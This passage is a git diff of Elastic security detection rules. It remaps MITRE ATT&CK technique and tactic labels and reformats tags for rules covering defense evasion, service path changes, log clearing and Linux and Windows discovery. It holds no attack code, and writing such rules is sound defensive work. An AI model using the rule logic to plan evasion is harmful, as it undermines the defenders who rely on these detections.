"https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml index 51ce78a36d2..6c94369c5a7 100644 --- a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml +++ b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -27,7 +27,16 @@ references = ["https://irsl.medium.com/the-trouble-with-microsofts-troubleshoote risk_score = 21 rule_id = "808291d3-e918-4a3a-86cd-73052a0c9bdc" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -50,31 +59,14 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml index 1c1aa8ae3d2..a081138d5d5 100644 --- a/rules_building_block/defense_evasion_outlook_suspicious_child.toml +++ b/rules_building_block/defense_evasion_outlook_suspicious_child.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Suspicious Outlook Child Process" risk_score = 21 rule_id = "6cf17149-a8e3-44ec-9ec9-fdc8535547a1" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -64,13 +72,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml index 05aa2a61ba6..88639b9b669 100644 --- a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml +++ b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -174,21 +174,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml index f38adcbf777..c008bcb22fd 100644 --- a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml +++ b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -143,21 +143,39 @@ value = "?:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Se [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_service_disabled_registry.toml b/rules_building_block/defense_evasion_service_disabled_registry.toml index cc41fc4c9ba..c1f1d49dab7 100644 --- a/rules_building_block/defense_evasion_service_disabled_registry.toml +++ b/rules_building_block/defense_evasion_service_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -48,23 +48,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml index f2d9b61fb4e..9eb28e15955 100644 --- a/rules_building_block/defense_evasion_service_path_registry.toml +++ b/rules_building_block/defense_evasion_service_path_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -20,7 +20,16 @@ name = "Service Path Modification" risk_score = 21 rule_id = "f243fe39-83a4-46f3-a3b6-707557a102df" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -42,36 +51,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index f8c032bc23e..5a13a3271d6 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,17 @@ name = "Service Path Modification via sc.exe" risk_score = 21 rule_id = "c5677997-f75b-4cda-b830-a75920514096" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -38,36 +48,48 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/defense_evasion_unsigned_bits_client.toml b/rules_building_block/defense_evasion_unsigned_bits_client.toml index 7d83ae84a7f..84012c3b2d4 100644 --- a/rules_building_block/defense_evasion_unsigned_bits_client.toml +++ b/rules_building_block/defense_evasion_unsigned_bits_client.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -44,13 +44,24 @@ not process.code_signature.status : ("errorExpired", "errorCode_endpoint*") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml index ad7ea692da9..ca738169f21 100644 --- a/rules_building_block/defense_evasion_write_dac_access.toml +++ b/rules_building_block/defense_evasion_write_dac_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -42,7 +42,16 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Rule Type: BBR", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Rule Type: BBR", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "query" @@ -54,26 +63,19 @@ host.os.type: "windows" and event.action : ("Directory Service Access" or "objec [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.001" +name = "Windows File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/discovery_capnetraw_capability.toml b/rules_building_block/discovery_capnetraw_capability.toml index fc509abd200..66cd382d8ff 100644 --- a/rules_building_block/discovery_capnetraw_capability.toml +++ b/rules_building_block/discovery_capnetraw_capability.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/12/24" [rule] author = ["Elastic"] @@ -49,7 +49,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "new_terms" @@ -67,23 +74,11 @@ id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1040" -name = "Network Sniffing" -reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_generic_account_groups.toml b/rules_building_block/discovery_generic_account_groups.toml index ce6ec481af5..eb8dadcd502 100644 --- a/rules_building_block/discovery_generic_account_groups.toml +++ b/rules_building_block/discovery_generic_account_groups.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -64,17 +64,10 @@ and not process.parent.name : "LTSVC.exe" and not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" @@ -85,11 +78,11 @@ id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -100,12 +93,15 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" + [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml index a7bc9dae1fb..981adb13784 100644 --- a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml +++ b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/12" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/12/24" [rule] author = ["Elastic"] @@ -66,14 +66,15 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml index 68e6f743fc7..3df1dd8bd91 100644 --- a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml +++ b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -59,16 +59,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml index 1dec0fd05c4..eee45ca1da0 100644 --- a/rules_building_block/discovery_linux_modprobe_enumeration.toml +++ b/rules_building_block/discovery_linux_modprobe_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -44,7 +44,13 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "new_terms" @@ -67,37 +73,15 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml index 81a0034b824..332fd65a447 100644 --- a/rules_building_block/discovery_linux_sysctl_enumeration.toml +++ b/rules_building_block/discovery_linux_sysctl_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -44,7 +44,13 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "new_terms" @@ -64,27 +70,15 @@ file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*) and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_system_owner_user_discovery.toml b/rules_building_block/discovery_linux_system_owner_user_discovery.toml index f5ed9b7ff4e..fe5f446429f 100644 --- a/rules_building_block/discovery_linux_system_owner_user_discovery.toml +++ b/rules_building_block/discovery_linux_system_owner_user_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -50,15 +50,11 @@ id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" -[[rule.threat.technique.subtechnique]] -id = "T1069.001" -name = "Local Groups" -reference = "https://attack.mitre.org/techniques/T1069/001/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_net_share_discovery_winlog.toml b/rules_building_block/discovery_net_share_discovery_winlog.toml index 6face7dc939..4d83aa90687 100644 --- a/rules_building_block/discovery_net_share_discovery_winlog.toml +++ b/rules_building_block/discovery_net_share_discovery_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Potential Network Share Discovery" risk_score = 21 rule_id = "b2318c71-5959-469a-a3ce-3a0768e63b9c" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Discovery", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Rule Type: BBR", + "Data Source: Windows Security Event Logs", +] type = "eql" query = ''' @@ -36,13 +44,26 @@ sequence by user.name, source.port, source.ip with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules_building_block/discovery_net_view.toml b/rules_building_block/discovery_net_view.toml index abbd287678c..196586ddc82 100644 --- a/rules_building_block/discovery_net_view.toml +++ b/rules_building_block/discovery_net_view.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -56,7 +56,17 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = ["Domain: Endpoint", 